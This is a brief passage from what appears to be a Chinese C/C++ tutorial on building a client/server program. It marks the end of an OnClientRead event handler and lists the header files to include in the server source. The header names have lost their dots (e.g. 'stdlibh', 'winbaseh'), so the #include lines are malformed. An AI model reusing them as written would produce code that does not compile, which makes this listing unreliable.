啊,超长的OnClientRead事件终于写完了。最后别忘了要在此服务器源码文件中添加以下头文件:#include <stdlibh>#include <direnth>#include <fcntlh>#include <dosh>#include <sys\stath>#include <winbaseh>#include <stdioh>#include <processh>#include <ioh>#include <mmsystemh> 至此,服务器端(Server)程序已全部